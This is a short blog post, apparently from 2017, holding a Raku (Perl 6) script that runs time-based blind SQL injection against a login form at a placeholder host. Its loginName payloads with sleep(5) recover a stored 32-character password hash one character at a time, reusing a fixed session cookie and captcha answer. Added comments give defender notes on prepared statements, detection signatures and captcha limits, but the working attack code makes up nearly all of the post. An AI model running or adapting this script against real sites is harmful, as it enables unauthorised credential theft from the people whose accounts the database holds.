perl6 一个猜测密码的注入

use HTTP::UserAgent;


# Time-based blind SQL injection probe against a login form (Raku / Perl 6).
# The script sends one POST to $url per (position, candidate character) pair.
# Each request carries a loginName value that closes the SQL string literal and
# adds a condition calling sleep(5) when the candidate equals the character at
# that position of the `password` column. A response that takes 5 seconds or
# more is treated as a match.
#
# Review notes (defender's view):
#  - This only works if the login handler concatenates loginName into its SQL
#    text. Bind parameters / prepared statements remove the injection point.
#  - Server-side signature: many POSTs to the login URL on one JSESSIONID, with
#    substr( / sleep( in loginName, and periodic responses delayed by ~5 s.
#  - The same session cookie and vcode value are sent on every request.
#    Presumably the captcha answer stays valid for the whole session (TODO
#    confirm against the target application). A captcha invalidated after each
#    attempt, or per-session/per-account attempt limits, would break this loop.
my $ua = HTTP::UserAgent.new;
my $r = HTTP::Request.new;
my $c = HTTP::Cookies.new;
# Hard-coded session identifier, reused for all requests below.
$c.set-cookie('Set-Cookie:JSESSIONID=06617AD9F324C7D49D3218D800B8FBB6');
# Placeholder host; note the login form is addressed over plain http.
my $url = 'http://target/login.do';
$r.uri: $url;
$r.set-method: 'POST';
$r.add-cookies($c);

# Browser-like User-Agent: filtering on UA will not separate this traffic from
# a normal Firefox client, so detection has to key on request content and timing.
$r.header.field(:user-agent<Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0>);
# Form fields of the login request; loginName is overwritten inside the loop.
my %data = :loginName<inject>,:password<admin>,:vcode<vzhc>;

# Candidate alphabet: digits 0-9 followed by lowercase a-z (36 values).
my @a = 0..9;
my @swap = 'a'..'z';
@a.append(@swap);
# Characters recovered so far, in the order they were found.
my @password;
# Outer loop: character position 1..32 (substr is 1-based in the SQL fragment).
# NOTE(review): 32 positions over [0-9a-z] looks like a hex digest such as
# unsalted MD5 -- assumption, not shown here. If so, the stored value should be
# migrated to a salted, slow password hash.
for 1..32 {
  for @a -> $char {
    # $_ is the outer loop's position. The injected condition is
    #   '<char>' != substr(password,<pos>,1) or 1=sleep(5)
    # so sleep(5) is only reached when the candidate equals the stored character.
    %data<loginName>="admin' and (\'$char\'!=substr(password,$_,1) or 1=sleep(5)) and ''='";
    # Re-attaches the form data to the same request object on every iteration.
    $r.add-form-data(%data);
    # Wall-clock timing around the request, using `time` before and after.
    my $stime = time;
    my $result = $ua.request($r);
    my $endtime = time;
    my $finish_time = $endtime-$stime;
    # A response taking at least 5 s is taken as "character matched".
    # The response body and status in $result are never inspected.
    if ($finish_time >= 5) {
      say $char;
      @password.append($char);
      say 'password-> '~@password.join('');
      # Stop trying candidates for this position and move to the next one.
      last;
    }
  }
  # If no candidate triggered the delay, nothing is appended for this position,
  # so the final string can be shorter than 32 characters.
}
# Print the recovered characters joined into one string.
say @password.join('');

 

posted on 2017-07-29 00:07  Perl6
